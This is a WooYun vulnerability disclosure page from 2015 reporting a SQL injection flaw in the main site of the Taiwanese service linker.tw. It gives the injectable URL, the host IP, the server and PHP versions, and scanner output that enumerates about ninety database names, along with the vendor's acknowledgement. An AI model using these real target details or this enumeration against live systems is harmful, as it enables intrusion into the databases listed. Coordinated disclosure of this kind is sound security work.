当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125266

漏洞标题:台湾连客网主站存在SQL注入漏洞

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 蝶.!

提交时间:2015-07-13 07:37

修复时间:2015-08-27 09:44

公开时间:2015-08-27 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

台湾连客网SQL注入漏洞 涉及大量数据库

详细说明:

Analyzing http://linker.tw/url.php?uct=0-0-12-5-0*31
Host IP: 59.120.218.253
Web Server: Apache/2.2.6 (Fedora)
Powered-by: PHP/5.2.4
Selected Column Count is 4
Injection type is String (')
Finding string column: 1
Valid String Column is 1
DB Server: MySQL
Finding current data base
Current DB: vLi_nker

漏洞证明:

Data Base Found: information_schema
Data Base Found: C_G_service
Data Base Found: HO_NGYI
Data Base Found: Hu_anqiou
Data Base Found: Linker_Log
Data Base Found: _EMO_T
Data Base Found: _EMO_T_Back20120706
Data Base Found: _EMO_T_bak121011
Data Base Found: _EMO_T_bak150707
Data Base Found: _Hbmc
Data Base Found: _X_linkerapp
Data Base Found: __ba
Data Base Found: __demo_tTV_he_cc
Data Base Found: __idipc
Data Base Found: _cCar
Data Base Found: _cPaiHsin
Data Base Found: _demo_tTV_he_cc
Data Base Found: _electric
Data Base Found: _inttrade
Data Base Found: _kueia
Data Base Found: _liuhao
Data Base Found: _mLinkerCard
Data Base Found: _stationery
Data Base Found: _tTV_he_cc
Data Base Found: _taiwanroad
Data Base Found: _taiwanroad_bak
Data Base Found: _taiwanroad_bak_0121_01
Data Base Found: _taiwanroad_bak_1222_01
Data Base Found: _taiwanroad_bak_1222_02
Data Base Found: _taiwanroad_bak_1228_01
Data Base Found: _taiwanroad_bak_clear
Data Base Found: _teacherweb
Data Base Found: aEs_hopWeb
Data Base Found: aM_yLife_GO
Data Base Found: a_Food
Data Base Found: be_gining_bak130709
Data Base Found: be_ginning
Data Base Found: be_ginning_bak
Data Base Found: be_ginningcn
Data Base Found: be_ginningen
Data Base Found: brows_nums
Data Base Found: c_Alice
Data Base Found: ca_ptain
Data Base Found: ch_KMT
Data Base Found: changhua_fba
Data Base Found: cheerg
Data Base Found: chkmtapp_sys_msg
Data Base Found: demo_tTV_he_cc_120708bak
Data Base Found: draw
Data Base Found: eS_hop
Data Base Found: fA_ctivity
Data Base Found: fc
Data Base Found: green__waves
Data Base Found: hair
Data Base Found: hebytaxi
Data Base Found: im_School
Data Base Found: iserve_platform
Data Base Found: j_Facebook
Data Base Found: jhutang
Data Base Found: jipen_electric
Data Base Found: jipen_electric_bak_0121_01
Data Base Found: jipen_electric_bak_1222_01
Data Base Found: jipen_electric_clear
Data Base Found: kN_ews
Data Base Found: k_itchenware
Data Base Found: k_itchenware_bak
Data Base Found: k_itchenware_bak130601
Data Base Found: life8_doucmentary
Data Base Found: lu_gangtour
Data Base Found: mysql
Data Base Found: ncue_cee
Data Base Found: pills
Data Base Found: plus
Data Base Found: rTecDv
Data Base Found: r_ace
Data Base Found: r_ace_2013
Data Base Found: r_ace_2014
Data Base Found: r_ace_bak
Data Base Found: s_tar
Data Base Found: st_ar
Data Base Found: tTV_he_cc
Data Base Found: tTV_he_cc_120708bak
Data Base Found: tu_tor
Data Base Found: vB_oss
Data Base Found: vLi_nker
Data Base Found: vM_yMind
Data Base Found: vMy_Life
Data Base Found: xLinkerShop
Data Base Found: xMyM_ind
Data Base Found: ya_ju
Data Base Found: yan
Data Base Found: ypv
Data Base Found: yuanlinfa_db

修复方案:

版权声明:转载请注明来源 蝶.!@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-13 09:42

厂商回复:

感謝通報!!

最新状态:

暂无